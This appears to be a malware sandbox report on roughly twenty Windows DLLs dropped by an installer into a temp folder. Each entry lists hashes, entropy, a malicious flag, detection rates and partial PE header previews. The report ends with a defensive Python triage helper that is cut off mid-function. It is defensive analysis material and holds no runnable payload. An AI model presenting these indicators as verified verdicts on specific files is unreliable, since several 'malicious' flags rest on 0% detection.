                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121524
                                                                                                    Entropy (8bit):6.347995296737745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
                                                                                                    MD5:6CE25FB0302F133CC244889C360A6541
                                                                                                    SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
                                                                                                    SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
                                                                                                    SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):248694
                                                                                                    Entropy (8bit):6.346971642353424
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                                                    MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                                                    SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                                                    SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                                                    SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98626
                                                                                                    Entropy (8bit):6.478068795827396
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                                                    MD5:70CA53E8B46464CCF956D157501D367A
                                                                                                    SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                                                    SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                                                    SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65181
                                                                                                    Entropy (8bit):6.085572761520829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                                                    MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                                                    SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                                                    SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                                                    SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):235032
                                                                                                    Entropy (8bit):6.398850087061798
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
                                                                                                    MD5:E1D0ACD1243F9E59491DC115F4E379A4
                                                                                                    SHA1:5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
                                                                                                    SHA-256:FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
                                                                                                    SHA-512:392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):337171
                                                                                                    Entropy (8bit):6.46334441651647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
                                                                                                    MD5:51D62C9C7D56F2EF2F0F628B8FC249AD
                                                                                                    SHA1:33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
                                                                                                    SHA-256:FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
                                                                                                    SHA-512:03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26562
                                                                                                    Entropy (8bit):5.606958768500933
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                                                    MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                                                    SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                                                    SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                                                    SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174543
                                                                                                    Entropy (8bit):6.3532700320638025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
                                                                                                    MD5:65D8CB2733295758E5328E5A3E1AFF15
                                                                                                    SHA1:F2378928BB9CCFBA566EC574E501F6A82A833143
                                                                                                    SHA-256:E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
                                                                                                    SHA-512:BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1545467
                                                                                                    Entropy (8bit):6.529166035051036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:f//9GOTyiDI4jm0B4/W1EkWLENaQemY0y6hW98cA4q0v4gf:bVYKW983e
                                                                                                    MD5:7F95672216191C57573D049090125ECE
                                                                                                    SHA1:2C9D065A1F28F511149C3DBA219B52004FC51262
                                                                                                    SHA-256:689991853CD09032089F52656C9508061F105FAB5727F250890563EBF2656A45
                                                                                                    SHA-512:FD0DD095D5D76400FA97F5B3231D16570284EC31D04E2E9F3278F378233F316D4D91715898BF8A1B81803E613B97B2FE5FB064A9BD6BAE6E08AD3CAB9613E61B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........~.........#.....4...z...............P.....o.......................................... ..........................p...0...............................p...t...........................`.......................2..D............................text....2.......4..................`.P`.data........P... ...8..............@.`..rdata..@....p.......X..............@.`@/4.......M...P...N...2..............@.0@.bss..................................`..edata...p.......r..................@.0@.idata.......0......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc...t...p...v..................@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):268404
                                                                                                    Entropy (8bit):6.265024248848175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
                                                                                                    MD5:C4C23388109D8A9CC2B87D984A1F09B8
                                                                                                    SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
                                                                                                    SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
                                                                                                    SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............|..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):509934
                                                                                                    Entropy (8bit):6.031080686301204
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                                                                    MD5:02E6C6AB886700E6F184EEE43157C066
                                                                                                    SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                                                                    SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                                                                    SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1400653
                                                                                                    Entropy (8bit):6.518664771362139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:YiyJaaUAnPfI1FO1Fm5wukMdBdfrwQAZV2R6yeYH3bhlN77S+N+RoQ8J0fnuVj1z:4aaUAnI1FOFmZkM1i2n5h++N+RCJ0fA1
                                                                                                    MD5:1124DD59526216DF405C4514949CCB54
                                                                                                    SHA1:8226C42D98B9D3C0E83A11167963D5B38B6DDD45
                                                                                                    SHA-256:A9016D40755966C547464430D3509CC3CFE9DD5D8B53F8B694B42B0D7141E5D6
                                                                                                    SHA-512:F007FBD3FBA7E3966FAF5F9D857ADB6607A99CD6FD8FFDF14E858BE6C4A0B155A9197BAA9D1DF0A28AF733F78F8A7346357EBAA7D3BD0C3934BF815CC51A930D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........F.........#.........B... .................q.................................y........ ...................... .......................................0..t............................ ......................8................................text...............................`.P`.data...............................@.`..rdata..Tn... ...p..................@.`@/4.......c.......d...x..............@.0@.bss..................................`..edata....... ......................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..reloc..t....0......................@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):291245
                                                                                                    Entropy (8bit):6.234245376773595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                                                    MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                                                    SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                                                    SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                                                    SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30994
                                                                                                    Entropy (8bit):5.666281517516177
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                                                    MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                                                    SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                                                    SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                                                    SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):140752
                                                                                                    Entropy (8bit):6.52778891175594
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
                                                                                                    MD5:A8F646EB087F06F5AEBC2539EB14C14D
                                                                                                    SHA1:4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
                                                                                                    SHA-256:A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
                                                                                                    SHA-512:93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):441975
                                                                                                    Entropy (8bit):6.372283713065844
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
                                                                                                    MD5:6CD78C8ADD1CFC7CBB85E2B971FCC764
                                                                                                    SHA1:5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
                                                                                                    SHA-256:C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
                                                                                                    SHA-512:EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................|....................................................................................text...4|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..|...........................@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64724
                                                                                                    Entropy (8bit):5.910307743399971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                                                                    MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                                                                    SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                                                                    SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                                                                    SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):814068
                                                                                                    Entropy (8bit):6.5113626552096
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
                                                                                                    MD5:5B1EB4B36F189362DEF93BF3E37354CC
                                                                                                    SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
                                                                                                    SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
                                                                                                    SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................
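The records above each give Size, Entropy (8bit), MD5/SHA1/SHA-256/SHA-512 and a raw preview of the PE header and section table (.text, .data, .rdata, /4, .bss, .edata, .idata, .CRT, .tls, .reloc), while the signature list flags a "PE file has a writeable .text section". The following Python triage helper is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it reproduces the hash fields, computes 8-bit Shannon entropy (assumed to be what the report's "Entropy (8bit)" column measures), and parses the COFF section table to flag any section that is both code/executable and writable. The section flag constants are the PE/COFF specification values; the PE image it runs on is constructed inline for demonstration and is not one of the dropped files listed here.

```python
"""Added triage helper: reproduces a sandbox report's per-file hash and
8-bit entropy fields and checks the PE section table for a writable code
section. Example code, not part of the Joe Sandbox report or the sample.
"""
import hashlib
import math
import struct
from collections import Counter

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256/SHA-512 as upper-case hex, using the report's labels."""
    return {
        label: hashlib.new(algo, data).hexdigest().upper()
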